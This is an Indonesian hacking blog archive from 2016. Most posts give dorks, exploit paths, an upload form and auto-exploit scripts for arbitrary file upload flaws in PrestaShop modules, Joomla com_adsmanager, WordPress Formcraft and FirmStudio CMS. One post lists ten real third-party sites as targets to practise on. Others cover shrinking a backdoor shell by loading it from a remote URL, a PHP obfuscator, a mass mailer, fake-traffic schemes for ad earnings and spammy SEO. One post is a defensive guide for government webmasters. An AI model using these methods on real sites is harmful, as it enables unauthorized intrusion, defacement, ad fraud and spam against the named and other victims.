Sabtu, 25 Juni 2016

Auto Exploit Prestashop 1.6 Arbitrary File Upload


Memudahkan untuk yang males copas atu" dari link ke exploit csrf, bisa make cara ini :v
Untuk dork dan penjelasan lain bisa artikel sebelumnya kesini

Script original dari ustadcage48

Comot dimari :
disini

Semoga Bermanfaat :)

Trik Mempercepat Penghasilan Popcash.net


Buat yg ga' sabar nunggu earning popcash kok lama yaa? ya itu krna visitor di site/blogmu rendah :'v
tpi jgn nyerah, di tutor ini seperti di judul w akan share triknya dsini
lngsng ja ya ke step stepnya..

Syarat :
- Akun Popcash (Kalau blm, ikutin intruksi+cara cepat di approve disini)
- Email aktif tentunya
*Jika sudah punya syarat"ny bisa lngsng ikutin langkah" dibawah

Cara Mudah Mendapatkan Url Popcash :
- Khusus untuk pengguna Mozilla Firefox
- Masuk ke Option > Content > Pop-ups > Centang Block pop-up windows
- Buka site/blogmu yg sdh terpasang script dari Popcash
- Klik di sembarang sisi pada blog. Nanti akan muncul notif seperti gmbar di bwah ini, lalu Klik pada Options > Klik Show 'http://www.popcash.net/world/go/blablabla..'
- Ketika muncul popup window nya, langsung copas link nya sebelum ke redirect ke website iklan lain
- Jika yang lu copas benar, kurang lebih seperti ini
http://www.popcash.net/world/go/111XXX/240207/aHR0cCUzQSXXXXXXXXXXXXXXXX
- Jika tidak sama dengan contoh url diatas, brarti salah. Ulangin lagi langkah diatas. Dan jika sudah dapat url popcashnya bisa lanjut ke langkah dibawah

Next step..
Langkah - Langkah :
- Daftar disini
- Klik "Sign Up"
- Isi data seperti biasanya
- lalu konfirm email untuk aktivasi
- Jika sudah masuk ke menu "My Website>ADD NEW WEBSITE"
- Isi formnya dengan link popcashmu, jika sudah klik Submit, lebih jelasnya lihat gambar dibawah
- Sekarang masuk ke menu "Earn Traffic" > Lalu download software HitLeap Viewernya
- Install dan Buka software nya, login dengan akunmu.
- Jika sudah masuk akan seperti gmbar dibawah ini, lalu klik "START EARNING MINUTES"
- Dan biarkan softwarenya bekerja, Minimaze saja jika ingin membuka browser atau yg lain
- Tiap menit yang lu gunakan untuk surfing di situs ini, akan menambah All-Time Minutes Earned yang nantinya akan ditukar dengan kunjungan ke situs popcash tadi. Udah kebayang kan gmna cara kerja softwarenya :D

HASIL DALAM 2 HARI
Sebelum
 Sesudah
Semoga bermanfaat :)

Rabu, 22 Juni 2016

Warehouse - Responsive Prestashop 1.6 Arbitrary File Upload

Exploit Author :
people_hurt

Dork :
- inurl:/modules/columnadverts/
- Kembangin lagi ya :D

Jika Vuln akan seperti ini :
Exploit & poc :
- /modules/columnadverts/uploadimage.php
- /modules/homepageadvertise/uploadimage.php
- /modules/productpageadverts/uploadimage.php
- /modules/simpleslideshow/uploadimage.php
- dan lain"

Exploit :
<form method="POST" action="TARGET/modules/module name/uploadimage.php"
enctype="multipart/form-data">
<input type="file" name="userfile" /><button>Upload</button>
</form>
Respon : success:shell.xxx
Auto Exploit:
DISINI

Shell Access :
TARGET/modules/modul name/slides/shell.xxx

Sabtu, 18 Juni 2016

PHP Inbox Mailer [Tinggal Make]


[MASIH ERROR, JGN DIPAKE DULU]
Pasti dah pada tau kan ini buat apa, stelah ngoding berhari" jadilah ni tools
ada 2 versi disini yang gk make smtp dan make smtp..
Smua tools ini free..
Apalah arti privat? hahaha ^.^

Link Tools :
- Dengan SMTP -> Disini
- Tanpa SMTP -> Disini

*Kalo ada error atau apa, bisa brkomentar :)

Semoga bermanfaat :D

PHP Script Encoder dengan Looping [EASY STEP]


Kali ini w mau share tool buat mengencrypt script php,
Udah tau lah ya fungsinya buat apa? Yaa fungsinya buat ngerubah script php yang biasa menjadi angka dan huruf random yang mungkin buat para pemula pasti kebingungan kalau mau nyolong script itu tdi ditambah dengan fitur looping jadi encodenya bisa d lakukan berulang" :D hehe..

dah gitu aja ya pnjelasan sngkatnya
Tool nya w bikin online. untuk yng pengen source codenya pm aja lwt fb :D

Cara Penggunaan :
- Masukin script phpmu tanpa <? php
- Result akan muncul dibawah, seperti contoh gmbar d bwah ini
Link Tool :
Disini

Semoga Bermanfaat :D

Senin, 06 Juni 2016

GRAYHAT SEO PAGE ONE GOOGLE

Hari ini gw akan share trik privat yang bisa menjadi cara alternatif buat lu yang pengen blog/sitenya jadi nomer satu di google search, perpaduan antara teknik blackhat seo dan whitehat seo. Cara ini gw namain GRAYHAT SEO PAGE ONE GOOGLE, sebut saja di tutorial ini kita membahas Cara merebut halaman pertama google...
NB: TRIK INI AMAN JIKA ANDA MENGIKUTI STEP-STEP DIBAWAH DENGAN BENAR DAN TIDAK BERLEBIHAN!

NAMA TUTORIAL : GRAYHAT SEO PAGE ONE GOOGLE
MADE BY : YUZA - 2016
Indonesia punya ini hahaha..

ALAT PERANG (WAJIB) :
- Email aktiv
- Seo Link Builder, download dimari
- Indexer, download disini

Okee, skarang lngsng ke tutorial nya,
udah w bagi ke beberapa kegiatan, untuk menghindari spam detection oleh google. Ikutin baik" step stepnya:

A. YANG HARUS LU LAKUIN SETIAP HARI
PERTAMA:
1. Rajin update artikel, tujuannya supaya pengunjung blog bisa melihat perkembngan dari tema blog yang lu usung/tema blogmu
2. Share/Promosiin artikel/blogmu ke social media, biasanya ada di grup"
3. Untuk meningkatkan Traffic, bisa menggunakan teknik BlogWalking yaitu cara dimana lu saling tukar site/blog ke seseorang (saling mengunjungi)

KEDUA:
1. Submit url blog/site mu menggunakan Seo Link Builder
2. Install link builder seperti biasa, klo blum punya baca lagi dari atas
3. Buka Seo Link Builder, Setting seperti gambar dibawah ini
4. Tunggu sampai proses selesai, nanti akan ditandai Linking Complete

B. YANG LU HARUS LAKUIN SEMINGGU SEKALI
PERTAMA:
1. Submit url/site mu ke 3.500 backlink
2. Masuk kesini
3. Isikan seperti biasa, jika kurang jelas lihat gambar dibawah ini

KEDUA:
1. Submit url/site mu ke Indexer, download toolsnya diatas
2. Install seperti biasanya, Isi sperti gambar dibawah ini
3. Jika selesai akan mncul Proses Complete!

C. YANG HARUS LU LAKUIN SEBULAN SEKALI
1. Submit url/site mu disini
2. Isi seperti gambar dibawah
3. Nanti bberapa submission akan failed. Bukan berarti error, tapi lu harus submit manual.
4. Berikut ini submit yang harus lu kunjungi:
- Google : disini
- Bing : disini
5. Beberapa akan dikirim ke emailmu..
6. Buka saja urlnya, dan Submit manual


HASILNYA
Copy Paste Mohon Sertakan Sumber Asli :)
Semoga Bermanfaat :)

Sabtu, 04 Juni 2016

Trik Memperkecil Size Shell Backdoor

Trik ini simple banget dan gw lihat belum banyak yang tau trik ini :)
So apa salahnya kalau gw share triknya dimari..
siapa sih yang kadang mau upload shell terus size kegedean ? pasti nunggunya agak lama kan, hehe
Kali ini kita memanfaatkan function file_get_contents pada php

Langkah Langkah :
1. Buat script seperti ini:

2. Ganti XXX dengan backdoor(file.php) yang terupload di web dengan format .txt . Lebih jelasnya lihat gambar dibawah :D
3. Jadi nanti seperti ini "...file_get_contents("sitemu.com/filemu.txt")..."
4. Dan lihat size backdoormu  sekarang, gak sampek 1kb :'v


Semoga Bermanfaat :)

Trik Mempercepat Loading Blog

Kali ini gw mau share trik cara mempercepat loading blog dengan Javascript Lazy Load, bisa langsung di cek lwat tool ini

Oke lngsung ke langkah-langkahnya ya :
1. Masuk ke Blogger
2. Template
3. Edit HTML
4. Tambahkan code di bawah sebelum </ body >

5. Save Template

Hasil Test Speed Blog :


Dah ya gitu ja ya :D
Semoga Bermanfaat :)

Kamis, 02 Juni 2016

Alasan Kenapa Website Pemerintah Mudah di Deface


Yaa seperti di judul. kali ini saya akan membahas kenapasih website pemerintah kita ini mudah di deface?
Mari kita pelajari sedikit demi sedikit, kemungkinan hal ini akan berkembang menjadi lebih lebar lagi.

Kita telaah dari sisi Defacer & Webmaster :

Defacer setiap hari selalu mencari celah keamanan website agar bisa di deface, melakukan penelitian terhadap sourcecode yang ada, melihat update vulnerability dari website-website security yang ada di jagad raya. Berdiskusi di forum untuk menemukan dan memecahkan sesuatu yang tidak bisa dipecahkan. Hal inilah yang biasanya hampir tidak pernah dilakukan oleh Webmaster & Administrator. Defacer, bisa saja terdiri dari banyak orang yang berbeda-beda dan berasal dari lokasi mana saja di dunia ini, misalkan: Indonesia, Turki, Brazil, India, Tunisia, dsb. Oleh sebab itu bisa kita golongkan bahwa defacer merupakan sebuah kumpulan orang banyak.

Administrator / Webmaster biasanya terdiri dari beberapa orang saja, bisa 1-3 orang saja. Administrator / Webmaster bertugas untuk mengatur dan mengurus website. Namun, entah kenapa kebanyakan webmaster & administrator website pemerintah Indonesia kebanyakan menggunakan layanan instant public (hosting, opensource cms, dsb), alangkah baiknya bila situs-situs pemerintah memiliki suatu badan tersendiri yang mengurusi hal ini (dalam bayangan).

Dari penjelasan di atas, terdapat beberapa kelebihan Defacer daripada Webmaster:

1. Defacer unggul dalam jumlah, karena defacer bisa siapa saja di dunia ini.
2. Defacer bergerak setiap hari mengikuti perkembangan security.
3. Defacer mencoba dan melakukan research terdahap kelemahan-kelemahan di website setiap saat.

Kita bisa melihat beberapa website pemerintah Indonesia yang di hack disini:
http://zone-h.org/archive/filter=1/domain=go.id/fulltext=1/page=1


Ada beberapa alasan mengapa website pemerintah mudah di deface:

1. Penggunaan CMS yang free dan opensource tanpa adanya modification. Sehingga keseluruhan konfigurasi menggunakan default konfigurasi, hal ini memudahkan para defacer untuk menemukan informasi file, directory, source, database, user, connection, dsb.
2. Tidak updatenya source atau tidak menggunakan versi terakhir dari CMS. Hal ini sangat rentan, karena security issue terus berkembang seiring masuknya laporan dan bugtrack terhadap source, kebanyakan hal inilah yang menjadi sebab website mudah dideface.
3. Tidak pernah ada research yang mendalam dan detail mengenai CMS sebelum digunakan & di implementasikan. Sehingga pemahaman dan pengetahuan dari webmaster hanya dari sisi administrasinya saja, tidak sampai ke level pemahaman sourcecode.
4. Tidak adanya audit trail atau log yang memberikan informasi lengkap mengenai penambahan, pengurangan, perubahan yang terjadi di website baik source, file, directory, dsb. Sehingga kesulitan untuk menemukan, memperbaiki dan menghapus backdoor yang sudah masuk di website.
5. Jarang melakukan pengecekan terhadap security update, jarang mengunjungi dan mengikuti perkembangan yang ada di situs-situs security jagad maya. Sehingga website sudah keduluan di deface oleh defacer sebelum dilakukan update dan patch oleh webmaster.
6. Kurangnya security awareness dari masing-masing personel webmaster & administrator. Sehingga kewaspadaan terhadap celah-celah keamanan cukup minim, kadangkala setelah website terinstall dibiarkan begitu saja. Kurangnya training dan kesadaran akan keamanan website seperti ini akan menjadikan website layaknya sebuah istana yang tak punya benteng.

Berikut screenshoot  Dari Zone-H.Org OpenSource CMS yang memiliki vulnerability


Vulnerability OpenSource CMS By Telematika.Co.Id

Vulnerability OpenSource CMS By Joomla.Org – Joomla 1.5

Untuk teman-teman Webmaster / Administrator website pemerintah, ada beberapa saran yang mungkin bermanfaat untuk dapat di implementasikan:


1. Wajib untuk mengikuti perkembangan source dari source website yang digunakan, backuplah website dan database sebelum dilakukan update.
2. Kebanyakan defacer telah memasang backdoor ketika telah berhasil melakukan deface website, hal ini dimungkinkan agar dapat melakukan deface ulang terhadap website. Wajib untuk memeriksa perubahan folder, file, database dan source terakhir dari website.
3. Pelajarilah lebih dalam mengenai dasar-dasar hacking dan antisipasinya (RFI, LFI, CSRF, SQL Injection, XSS, Exploit, Dsb) karena artikel ini sudah banyak bertebaran di Internet. Semakin banyak tahu & mengerti tentang sebuah kelemahan website dari dasar-dasar hacking, maka akan semakin banyak tahu pula bagaimana cara mengatasinya.
4. Sering-seringlah berdiskusi di forum dan milist yang berkaitan dengan perangkat serta aplikasi yang mensupport website anda, baik dari sisi operating system, tempat hosting, bugtrack milist, developer milist, dsb. Hal ini bertujuan agar informasi vulnerability dapat dipatch lebih cepat sebelum defacer beraksi.
5. Hardening website dan source wajib dilakukan, misalkan jangan menggunakan “default configuration”, aturlah sedemikian rupa “configuration website” dengan memperhatikan: permission, access level, indexing, database connection, database configuration, password dan user management.
6. Gunakanlah tambahan plugin / component yang tepat, sehingga dapat meminimalisasi terjadinya kegiatan defacing dari thirdparty. Pastikan hasil review & ranking plugin bereputasi baik dan sudah di verified oleh penyedia CMS yang bersangkutan.
7. Lakukanlah penetration testing terhadap website, baik secara lokal maupun langsung di website. Banyak tools penetration testing yang bisa digunakan: Nexus, Acunetix, dsb. Tapi yang paling bagus dan lebih cepat adalah, copy source dan database website, Install di local computer, kemudian lakukanlah penetration testing. Updatelah website bila ditemukan vulnerability.
8. Backdoor, baik (php, asp, perl, phyton) dikenali dengan baik oleh beberapa Antivirus, ada bisa cleaning dengan melakukan scanning terhadap source website secara local. Apabila tidak dikenali, terpaksa anda harus mencari secara manual.

Pada bagian ini, saya akan mencoba memberikan salah satu solusi apabila website sudah terlanjur dideface, silakan menggunakan langkah berikut:


1. Download source & database yang ada di website untuk backup. Hal ini untuk berjaga-jaga apabila langkah yang kita lakukan gagal, tetapi apabila konfigurasi & file benar dan lengkap dijamin 100% berhasil, terkecuali ada sesuatu yang terlewatkan.
2. Download source CMS versi terbaru dari website penyedia CMS, misalkan: www.drupal.org, www.joomla.org, www.wordpress.org, dsb.
3. Lakukanlah perbaikan database secara lokal, berjaga-jaga apabila backdoor ada di database. Biasanya didalam database ada access user tidak dikenal yang akses levelnya sama dengan Administrator.
4. Install CMS yang tadi sudah di download di web hosting. Kemudian lakukanlah konfigurasi: database, file permission, directory permission. Jangan menggunakan default configuration, modifikasilah konfigurasi-konfigurasi yang ada agar lebih powerfull.
5. Kemudian instalasi component: Themes, Plugin, Component, dsb. Gunakanlah yang paling update, atau source baru dari komponen yang akan di Install (Fresh Install Component).
6. Kemudian update database, dengan login ke Database Control Panel (phpMyAdmin, DB Admin, cPanel Database, dsb). Setelah anda melakukan login, maka importlah database.
7. Gantilah username Administrator & Password menggunakan nama yang lebih Unik, jangan menggunakan user (admin, administrator, adm1n, dsb) gunakanlah yang lebih powerful dan susah untuk di tebak untuk menghindari bruteforce, gunakanlah alias untuk menampilkan username administrator di web content.

Semoga sedikit sharing mengenai keamanan website ini berguna buat para sahabat-sahabat Webmaster & Administrator Website.

*Dikutip dari berbagai sumber
Semoga Bermanfaaat :)
Keep save & secure..

Rabu, 01 Juni 2016

Daftar Lengkap Domain Seluruh Dunia

 
Kali ini gw mo share daftar domain lengkap seluruh dunia
Berikut ini adalah daftar Top Level Negara-negara di Dunia yang dikeluarkan oleh Internet Assign Numbers Authority (IANA). IANA adalah salah satu badan independent yang mengatur masalah pengaturan Domain Internet. Saat ini (per tanggal 1 Januari 2002) terdaftar sebanyak 243 Negara yang terdaftar.

A
.ac – Pulau Ascension *
.ad – Andorra
.ae – Uni Emirat Arab
.af – Afganistan
.ag – Antigua dan Barbuda *
.ai – Anguilla
.al – Albania
.am – Armenia *
.an – Antillen Belanda
.ao – Angola
.aq – Antartika
.ar – Argentina
.as – Samoa Amerika *
.at – Austria *
.au – Australia
.aw – Aruba
.ax – Ã…land
.az – Azerbaijan

B
.ba – Bosnia Herzegovina
.bb – Barbados
.bd – Bangladesh
.be – Belgia *
.bf – Burkina Faso
.bg – Bulgaria
.bh – Bahrain
.bi – Burundi *
.bj – Benin
.bm – Bermuda
.bn – Brunei Darussalam
.bo – Bolivia *
.br – Brasil *
.bs – Bahama *
.bt – Bhutan
.bv – Pulau Bouvet (tidak dipakai dan tidak terdaftar)
.bw – Botswana
.by – Belarus
.bz – Belize *

C
.ca – Kanada
.cc – Pulau Cocos *
.cd – Republik Demokratik Kongo (dulunya .zr – Zaire) *
.cf – Republik Afrika Tengah
.cg – Republik Kongo *
.ch – Swiss *
.ci – Côte d’Ivoire (Pantai Gading)
.ck – Kepulauan Cook *
.cl – Chili
.cm – Kamerun
.cn – Republik Rakyat Tiongkok *
.co – Kolombia
.cr – Kosta Rika
.cs – Serbia dan Montenegro (dulunya .yu – Yugoslavia; Catatan: pada tanggal 3 Juni, 2006, Montenegro mendeklarasikan kemerdekaannya, sehingga domain ini tidak dipakai lagi.) (kode domain .cs tidak dipakai, tidak ada DNS) (kode domain .cs dulunya dipakai untuk Cekoslowakia)
.cu – Kuba
.cv – Tanjung Verde
.cx – Pulau Natal *
.cy – Siprus
.cz – Republik Ceko

D
.de – Jerman
.dj – Djibouti *
.dk – Denmark *
.dm – Dominika
.do – Republik Dominika
.dz – Aljazair (Algeria)

E
.ec – Ekuador
.ee – Estonia
.eg – Mesir
.eh – Sahara Barat (tidak dipakai; tidak ada DNS)
.er – Eritrea
.es – Spanyol *
.et – Ethiopia
.eu – Uni Eropa (kode domain yang “dikhususkan” oleh ISO 3166-1)

F
.fi – Finlandia
.fj – Fiji *
.fk – Kepulauan Falkland
.fm – Federasi Mikronesia *
.fo – Kepulauan Faroe
.fr – Perancis

G
.ga – Gabon
.gb – Britania Raya (Reserved domain by IANA; deprecated – see .uk)
.gd – Grenada
.ge – Georgia
.gf – Guyana Perancis
.gg – Guernsey
.gh – Ghana
.gi – Gibraltar
.gl – Greenland *
.gm – Gambia
.gn – Guinea
.gp – Guadeloupe
.gq – Guinea Khatulistiwa
.gr – Yunani *
.gs – Georgia Selatan dan Kepulauan Sandwich Selatan *
.gt – Guatemala
.gu – Guam
.gw – Guinea Bissau
.gy – Guyana

H
.hk – Hong Kong *
.hm – Pulau Heard dan Kepulauan McDonald *
.hn – Honduras *
.hr – Kroasia
.ht – Haiti
.hu – Hongaria *

I
.id – Indonesia
.ie – Republik Irlandia
.il – Israel *
.im – Pulau Man *
.in – India *
.io – Teritorial Britania di Samudra Hindia *
.iq – Irak
.ir – Iran *
.is – Islandia
.it – Italia

J
.je – Jersey
.jm – Jamaika
.jo – Yordania
.jp – Jepang

K
.ke – Kenya
.kg – Kirgizstan
.kh – Kamboja
.ki – Kiribati
.km – Komoro
.kn – Saint Kitts dan Nevis
.kp – Korea Utara (tidak dipakai; tidak ada DNS)
.kr – Korea Selatan
.kw – Kuwait
.ky – Kepulauan Cayman
.kz – Kazakhstan *

L
.la – Laos *
.lb – Lebanon
.lc – Saint Lucia
.li – Liechtenstein *
.lk – Sri Lanka
.lr – Liberia
.ls – Lesotho
.lt – Lituania
.lu – Luxemburg
.lv – Latvia *
.ly – Libya *

M
.ma – Maroko
.mc – Monako
.md – Moldova *
.me – Montenegro
.mg – Madagaskar
.mh – Kepulauan Marshall
.mk – Republik Makedonia
.ml – Mali
.mm – Myanmar
.mn – Mongolia *
.mo – Makau
.mp – Kepulauan Mariana Utara *
.mq – Martinique
.mr – Mauritania
.ms – Montserrat *
.mt – Malta
.mu – Mauritius *
.mv – Maladewa
.mw – Malawi *
.mx – Meksiko *
.my – Malaysia
.mz – Mozambik

N
.na – Namibia *
.nc – Kaledonia Baru
.ne – Niger
.nf – Pulau Norfolk *
.ng – Nigeria
.ni – Nikaragua
.nl – Belanda * (ccTLD terdaftar pertama)
.no – Norwegia
.np – Nepal
.nr – Nauru *
.nu – Niue *
.nz – Selandia Baru *

O
.om – Oman

P
.pa – Panama
.pe – Peru
.pf – Polinesia Perancis
.pg – Papua Nugini
.ph – Filipina *
.pk – Pakistan *
.pl – Polandia *
.pm – Saint-Pierre dan Miquelon
.pn – Kepulauan Pitcairn *
.pr – Puerto Riko *
.ps – Otoritas Nasional Palestina *
.pt – Portugal *
.pw – Palau
.py – Paraguay

Q
.qa – Qatar

R
.re – Réunion
.ro – Rumania *
.rs – Serbia
.ru – Rusia *
.rw – Rwanda

S
.sa – Arab Saudi
.sb – Kepulauan Solomon *
.sc – Seychelles *
.sd – Sudan
.se – Swedia *
.sg – Singapura
.sh – Saint Helena *
.si – Slovenia
.sj – Svalbard dan Jan Mayen (tidak dipakai; tidak terdaftar)
.sk – Slowakia
.sl – Sierra Leone
.sm – San Marino *
.sn – Senegal
.so – Somalia *
.sr – Suriname *
.st – Sao Tome dan Principe *
.su – Uni Soviet (terdepresiasi; digantikan; kode domain “dipakai untuk pergantian” oleh ISO 3166-1)
.sv – El Salvador
.sy – Suriah *
.sz – Swaziland *

T
.tc – Kepulauan Turks dan Caicos
.td – Chad
.tf – Teritorial Perancis Selatan
.tg – Togo *
.th – Thailand
.tj – Tajikistan *
.tk – Tokelau *
.tl – Timor Leste (dulunya .tp) *
.tm – Turkmenistan *
.tn – Tunisia
.to – Tonga *
.tp – Timor Timur (terdepresiasi – gunakan .tl; kode domain “dipakai untuk pergantian” oleh ISO 3166-1)
.tr – Turki
.tt – Trinidad dan Tobago *
.tv – Tuvalu *
.tw – Republik China (Taiwan) *
.tz – Tanzania

U
.ua – Ukraina
.ug – Uganda *
.uk – Inggris (kode domain yang “dikhususkan” oleh ISO 3166-1) (lihat pula .gb)
.us – Amerika Serikat *
.uy – Uruguay
.uz – Uzbekistan

V
.va – Vatikan
.vc – Saint Vincent dan Grenadines *
.ve – Venezuela
.vg – Kepulauan Virgin Britania Raya *
.vi – Kepulauan Virgin Amerika Serikat
.vn – Vietnam
.vu – Vanuatu *

W
.wf – Wallis dan Futuna
.ws – Samoa (dulunya Samoa Barat) *

Y
.ye – Yaman
.yt – Mayotte
.yu – Yugoslavia (kemudian berganti nama menjadi Serbia dan Montenegro)

(kode domain secara resmi digantikan oleh .cs (lihat di atas) namun tetap dipakai; kode domain “dipakai untuk pergantian” oleh ISO 3166-1)

Z
.za – Afrika Selatan *
.zm – Zambia
.zw – Zimbabwe

Tidak bersponsor
.biz .com .edu .gov .info .int .mil .name .net .org

Bersponsor
.aero .cat .coop .jobs .mobi .museum .pro .tel .travel

Infrastruktur
.arpa .root

Startup phase
.asia

Diusulkan
.berlin .bzh .cym .gal .geo .kid .kids .mail .nyc .post .sco .web .xxx

Dihapus
.nato

Dipesan
.example .invalid .localhost .test

Pseudo-domain
.bitnet .csnet .ip .local .onion .uucp

Joomla Com_Adsmanager Scanner + Auto Exploiter PHP

Dork :
- inurl:index.php?option=com_adsmanager
- inurl:index.php?option=com_adsmanager intitle:-ads site:.au
- intext:"adsmanager version 2.5"
- "com_adsmanager" site:.au
- Kembangin lagi ya :)

Exploit :
TARGET/index.php?option=com_adsmanager&task=upload&tmpl=component
*Jika vuln akan muncul {"jsonrpc" : "2.0", "result" : null, "id" : "id","tmpfile" : "_960"}

Shell Akses :
TARGET/tmp/plupload/NAMA_SHELL_KAMU.php

Script Auto Exploit :
Scriptnya disini sudah w jadiin satu di rar, cara gunainnya tinggal extraxt terus command seperti biasanya.
Download scriptnya disini

Cara Penggunaan :
- command: php scriptkamu.php targetlist.txt
- Untuk membuka akses shell kusus pengguna windows bisa lngsung command: hasil.html , nanti akan otomatis terbuka di browser.
- Lebih jelasnya lihat di ss bawah :)

Screenshot :
Semoga Bermanfaat :)

NGGAK BISA RUN FILE .PHP DI CMD WINDOWS? MASUK SINI

Formcraft Scanner + Auto Exploiter PHP

Dork :
- inurl:/wp-content/plugins/formcraft/ site:.au
- intext:"powered by formcraft"
- inurl:/plugins/formcraft
- Bisa dikembangin sndiri ya dorknya, hehe..

Exploit :
- /wp-content/plugins/formcraft/file-upload/server/php/
(Jika vuln akan ada tulisan seperti csrf kurang lebih seperti ini: "files":["name"] bla bla bla bla...)

Script Auto Exploit :
Tools sudah ku jadikan satu paket di rar, makenya tinggal extract lalu gunain sperti biasanya
Download scriptnya disini

Cara Penggunaan :
- Sebenarnya sudah ku tulis di scriptnya cara gunainya, tpi gppalah w tulis lagi dsini
- php namascriptmu.php targetlist.txt
- Jika success upload shell akan disimpan di hasil.htm
- Khusus pengguna windows bisa lnsung mengetikkan di command > hasil.htm (nanti akan kebuka langsung di browser otomatis)

Screenshot :
Semoga bermanfaat :)

NGGAK BISA RUN FILE .PHP DI CMD WINDOWS? MASUK SINI

Method Deface FirmStudio CMS (filemanager) Arbitrary File Upload

Sekitar 2.090 hasil (0,50 detik)
Lumayan lah website yang vuln dengan method ini, hehe..
gaisah basa basi lgi. simak baik" ye tutornya, lets cekidoot:
DORK :
- intext:"Website by FirmStudio"
- intext:"Website by FirmStudio" site:.de

EXPLOIT :
site.com/path/include/filemanager/dialog.php

CIRI-CIRI WEB VULN :

CARA UPLOAD SHELL :
- rename shellmu jadi:
1. shell.php.jpg
2. shell.php5
3. shell.php.png
4. shell.php.xxxjpg
5. kreasikan lagi ya, exstensi ini untuk mengbypass supaya bisa upload file.php, karena defaultnya  hanya menerima file .html .txt .gif
- Jika sudah di rename. Letak upload file ada sebelah kiri atas sebelah tulisan "Action"

SHELL AKSES :
site.com/uploaded_files/NAMA_SHELLMU
Kalo beruntung nih bisa dapet dir mayan lah, tapi kadang juga Not Writable smua, yg writable cuman file /temp/ doang. Caranya biar bisa akses tuh folder gunain method root server, bisa di googling :)
Buat belajar bisa gunaiin ini :
http://www.hiphing.com.hk/include/filemanager/dialog.php
http://www.cornes.hk/include/filemanager/dialog.php
http://www.jinchuan-intl.com/include/filemanager/dialog.php
http://www.starrhotels.com/include/filemanager/dialog.php
http://www.jewelryshows.org/include/filemanager/dialog.php
http://www.mhh.com.hk/include/filemanager/dialog.php
http://www.metrokitchen.com.hk/include/filemanager/dialog.php
http://www.alisan.com.hk/include/filemanager/dialog.php
http://www.cornesworld.com/include/filemanager/dialog.php
http://www.hairworks.com.hk/include/filemanager/dialog.php

Dah gitu aja ya, semoga bermanfaat :)
Keep Exploiting